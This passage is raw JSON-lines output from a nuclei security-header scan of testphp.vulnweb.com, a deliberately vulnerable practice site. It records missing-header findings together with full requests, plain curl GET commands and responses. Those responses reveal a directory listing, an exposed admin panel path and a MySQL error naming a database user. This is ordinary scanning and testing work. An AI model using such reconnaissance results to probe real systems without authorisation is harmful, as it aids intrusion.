'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:09.343685718Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.095504641Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.095508901Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.095514943Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.095543271Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.09561666Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , 